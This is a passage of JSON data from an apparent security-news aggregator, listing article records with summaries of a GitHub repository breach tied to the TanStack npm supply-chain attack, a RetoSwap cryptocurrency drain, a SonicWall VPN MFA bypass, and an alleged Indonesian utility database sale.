2026.","https:\u002F\u002Fwww.securityweek.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002FMicrosoft-Defender.jpg","2026-05-21T09:52:05+00:00","2026-05-21T10:00:06.094636+00:00",{"id":451,"url":452,"name":453},"39b11040-a763-4049-9bc5-8bbf376ca5af","https:\u002F\u002Ffeeds.feedburner.com\u002Fsecurityweek","SecurityWeek",{"id":12,"icon":9,"name":13,"slug":14,"description":15},[456,457,458],{"id":6,"slug":8,"name":7},{"id":77,"slug":79,"name":78},{"id":30,"slug":32,"name":31},"f2127e6a-c8bd-45a1-bbd8-2cf75f95b2c3",{"id":461,"title":462,"slug":463,"url":464,"summary":465,"ai_summary":466,"parent_article_id":9,"relation_type":9,"image_url":467,"verify_count":202,"avg_score":9,"score_count":202,"published_at":468,"ingested_at":469,"source":470,"category":471,"tags":472,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":477},"82ba1008-c993-4751-bc59-0fab8dbd4d3b","GitHub links repo breach to TanStack npm supply-chain attack","github-links-repo-breach-to-tanstack-npm-supply-chain-attack-8023fe","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F","GitHub says the hackers who breached 3,800 internal repositories gained access via a malicious version of the Nx Console VS Code extension, compromised in last week's TanStack npm supply-chain attack. [...]","GitHub disclosed a breach of 3,800 internal repositories stemming from an employee installing a malicious version of the Nx Console VS Code extension, which was compromised as part of the TanStack npm supply-chain attack attributed to TeamPCP. The poisoned extension (v18.95.0) was designed to steal credentials for npm, AWS, Kubernetes, GitHub, and GCP\u002FDocker; it was live for ~18 minutes on VS Code Marketplace and 36 minutes on OpenVSX before removal. TeamPCP has claimed access to ~4,000 private GitHub repos and is demanding at least $50,000 for the data.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F21\u002FGitHub_headpic.jpg","2026-05-21T06:54:01+00:00","2026-05-21T08:00:09.798135+00:00",{"id":358,"url":359,"name":360},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[473,474,475,476],{"id":66,"slug":68,"name":67},{"id":77,"slug":79,"name":78},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},"1673201a-f04e-453a-8683-1b4079122809",{"id":479,"title":480,"slug":481,"url":482,"summary":483,"ai_summary":484,"parent_article_id":9,"relation_type":9,"image_url":485,"verify_count":202,"avg_score":9,"score_count":202,"published_at":486,"ingested_at":487,"source":488,"category":489,"tags":490,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":494},"ab7e053e-2f59-47a1-90df-06a9bd2e8fd6","RetoSwap has been drained of 7,000 XMR ($2.7 Million) after a flaw in the Haveno protocol. https:...","retoswap-has-been-drained-of-7-000-xmr-2-7-million-after-a-flaw-in-the-haveno-pr-5e983d","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2057244918901342436","RetoSwap has been drained of 7,000 XMR ($2.7 Million) after a flaw in the Haveno protocol. https:\u002F\u002Ft.co\u002FXTF8A02Nos","RetoSwap, a cryptocurrency exchange or trading platform, suffered a significant loss of 7,000 Monero (XMR) valued at approximately $2.7 million following the exploitation of a flaw in the Haveno protocol. The incident highlights critical security issues in decentralized exchange infrastructure and protocol design.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHIzM2VOWMAAncHE.jpg","2026-05-20T23:39:45+00:00","2026-05-21T00:00:11.486133+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[491,492,493],{"id":48,"slug":50,"name":49},{"id":18,"slug":20,"name":19},{"id":66,"slug":68,"name":67},"4f29d891-6a1b-4e36-92b1-0b0971d3107a",{"id":496,"title":497,"slug":498,"url":499,"summary":500,"ai_summary":501,"parent_article_id":9,"relation_type":9,"image_url":502,"verify_count":202,"avg_score":9,"score_count":202,"published_at":503,"ingested_at":504,"source":505,"category":506,"tags":507,"ioc_count":300,"has_awareness_lesson":378,"awareness_lesson_id":511},"cc033463-8c43-4b80-a8ae-b966a54a41fa","Hackers bypass SonicWall VPN MFA due to incomplete patching","hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching-d03048","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching\u002F","Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. [...]","Threat actors exploited CVE-2024-12802 on SonicWall Gen6 SSL-VPN appliances to bypass multi-factor authentication and gain initial network access for ransomware deployment. ReliaQuest documented multiple intrusions between February and March 2026 where attackers successfully authenticated despite MFA being enabled, because organizations patched the firmware but failed to complete required manual LDAP remediation steps. The vulnerability does not affect Gen7\u002FGen8 devices, which are fully mitigated by firmware updates alone.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F20\u002FSonicWall.jpg","2026-05-20T21:19:17+00:00","2026-05-20T22:00:15.05039+00:00",{"id":358,"url":359,"name":360},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[508,509,510],{"id":36,"slug":38,"name":37},{"id":141,"slug":143,"name":142},{"id":30,"slug":32,"name":31},"0b304e0f-51be-4519-8263-feba38dd0f20",{"id":513,"title":514,"slug":515,"url":516,"summary":517,"ai_summary":518,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":519,"ingested_at":520,"source":521,"category":522,"tags":523,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":526},"d9182c5d-8514-48ef-8186-b4cc21222857","🚨🇮🇩 Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Adverti...","perumda-tirta-musi-palembang-alleged-customer-database-sale-437k-utility-records-f7e546","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2057196744161525900","🚨🇮🇩 Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Advertised\n\nhttps:\u002F\u002Ft.co\u002FIjAq8sSy2x","An Indonesian water utility company, Perumda Tirta Musi Palembang, reportedly had its customer database containing over 437,000 records exposed and advertised for sale. The breach includes personal and utility account information of customers in Palembang. This represents a significant privacy breach affecting a critical infrastructure provider in Indonesia.","2026-05-20T20:28:19+00:00","2026-05-20T21:00:12.22148+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[524,525],{"id":188,"slug":190,"name":189},{"id":183,"slug":185,"name":184},"d5a5d0f3-e846-4134-93aa-e8e827208528"]